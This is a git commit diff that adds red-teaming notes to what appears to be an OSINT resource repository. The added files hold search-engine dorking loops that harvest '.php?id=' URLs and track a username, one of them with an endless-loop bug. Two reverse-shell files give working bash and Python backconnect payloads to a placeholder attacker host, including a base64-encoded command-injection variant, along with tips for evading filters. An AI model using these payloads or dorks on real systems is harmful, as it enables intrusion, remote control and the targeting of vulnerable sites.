Added new path and resouces

2025-12-05 20:40:30 -08:00 · 2024-12-05 00:14:22 +07:00
parent e7e1f32e80
commit 834e9698f4
5 changed files with 103 additions and 1 deletions
--- a/script/Dorking-script.md
+++ b/script/Dorking-script.md
@@ -0,0 +1,37 @@
+PRO TIPS!
+
+You can add other headers, regex and search engine endpoints for refinement and to encode queries
+
+- BING SEARCH
+
+WEB
+
+```WEB
+for ((i=1;i<=10;i++));do curl -i -s -k -L -X GET -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" "https://www.bing.com/search?pglt=2081&q=.php?id=" | grep -Eo 'href="[^\"]+"' | grep -Po "(http|https)://[a-zA-Z0-9./?=_%:-]*" | grep ".php?id" | sort -u ;done
+```
+
+Hunt Username
+
+```USERNAME
+for ((i=1;1<=10;i++));do curl -i -s -k -L -X GET -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0;Accept: */*;Accept-Language: id,en-US;q-0.7,en;q-0.3;Accept-Encoding: gzip, deflate, br;Referer: https: //www.bing.com/;DNT: 1;Connection: keep-alive;Cookie: 1P_JAR=2023-11-05-19;Sec-Fetch-Dest:empty;Sec-Fetch-Mode:cors;Sec-Fetch-Site: same-origin;TE: trailers" "https://www.bing.com/search?pglt=2081&q=Jieyab89" | grep -Eo 'href="[^\"]+"' | grep -Po "(http|https)://[a-zA-Z0-9./?=_%:-]*" | grep -E "Jieyab89|github" | sort -u ;done
+```
+
+Hunt Username
+
+```USERNAME
+for ((i=1;1<=10;i++));do curl -i -s -k -L -X GET -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0;Accept: */*;Accept-Language: id,en-US;q-0.7,en;q-0.3;Accept-Encoding: gzip, deflate, br;Referer: https: //www.bing.com/;DNT: 1;Connection: keep-alive;Cookie: 1P_JAR=2023-11-05-19;Sec-Fetch-Dest:empty;Sec-Fetch-Mode:cors;Sec-Fetch-Site: same-origin;TE: trailers" "Your Bing Request URL Header" | grep -Eo 'href="[^\"]+"' | grep -Po "(http|https)://[a-zA-Z0-9./?=_%:-]*" | grep -E "Jieyab89|github" | sort -u ;done
+```
+
+- GOOGLE SEARCH
+
+Hunt Username
+
+```USERNAME
+for ((i=1;1<=10;i++));do curl -i -s -k -L -X GET -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0;Accept: */*;Accept-Language: id,en-US;q-0.7,en;q-0.3;Accept-Encoding: gzip, deflate, br;Referer: https: //www.google.com/;DNT: 1;Connection: keep-alive;Cookie: 1P_JAR=2023-11-05-19;Sec-Fetch-Dest:empty;Sec-Fetch-Mode:cors;Sec-Fetch-Site: same-origin;TE: trailers" "https://www.google.com/search?sourceid=chrome-psyapi2&ion=1&espv=2&ie=UTF-8&start=${i}0&q=Jieyab89" | grep -Eo 'href="[^\"]+"' | grep -Po "(http|https)://[a-zA-Z0-9./?=_%:-]*" | grep -E "Jieyab89|github" | sort -u ;done
+```
+
+WEB
+
+```WEB
+for ((i=1;i<=10;i++));do curl -i -s -k -L -X GET -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" "https://www.google.com/search?sourceid=chrome-psyapi2&ion=1&espv=2&ie=UTF-8&start=${i}0&q=.php?id=" | grep -Eo 'href="[^\"]+"' | grep -Po "(http|https)://[a-zA-Z0-9./?=_%:-]*" | grep ".php?id" | sort -u ;done
+```
--- a/script/Reverse-shell.md
+++ b/script/Reverse-shell.md
@@ -0,0 +1,20 @@
+# TIPS 
+
+If you have obtained a vulnerability such as RCE, file upload or something else, you can use the script below to spawn a shell or backconnect revershell. If the shell does not run see below
+
+1. Make sure the target has internet access (internet access opened)
+2. Try changing the port to a larger one such as 8080, 8888, etc. 
+3. Encode your script using base64 and then decode it 3. 
+4. Encode your script using url encode 
+
+## Script 1 
+
+```
+sh -i >& /dev/tcp/<YOUR HOST OR IP>/<PORT> 0>&1
+```
+
+## Script 2
+
+```
+; echo c2ggLWkgPiYgL2Rldi90Y3AvPFlPVVIgSE9TVCBPUiBJUD4vPFBPUlQ+IDA+JjE= | base64 -d | bash;"
+```
--- a/scripts/Reverse-shell.md
+++ b/scripts/Reverse-shell.md
@@ -0,0 +1,36 @@
+# TIPS 
+
+If you have obtained a vulnerability such as RCE, file upload or something else, you can use the script below to spawn a shell or backconnect revershell. If the shell does not run see below
+
+1. Make sure the target has internet access (internet access opened)
+2. Try changing the port to a larger one such as 8080, 8888, etc. 
+3. Encode your script using base64 and then decode it 3. 
+4. Encode your script using url encode 
+
+## Script 1 
+
+```
+socket=_import("socket");os=import("os");pty=import_("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR IP>",<PORT LISTENER>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")
+```
+
+## Script 2
+
+```
+import socket
+import subprocess
+import os
+
+def back_connect(host, port):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((host, port))
+    os.dup2(s.fileno(), 0)  
+    os.dup2(s.fileno(), 1)  
+    os.dup2(s.fileno(), 2)  
+    
+    subprocess.call(["/bin/sh", "-i"])
+
+host = "<YOUR IP>"  
+port = <YOUR LISTENER PORT>           
+
+back_connect(host, port)
+```
--- a/Team/README.md
+++ b/Team/README.md
@@ -0,0 +1,3 @@
+# Red Teaming 
+
+Welcome to path red teaming or pentesting for OSINT, on this path there are script and about tips about for enumeration, OSINT and other tips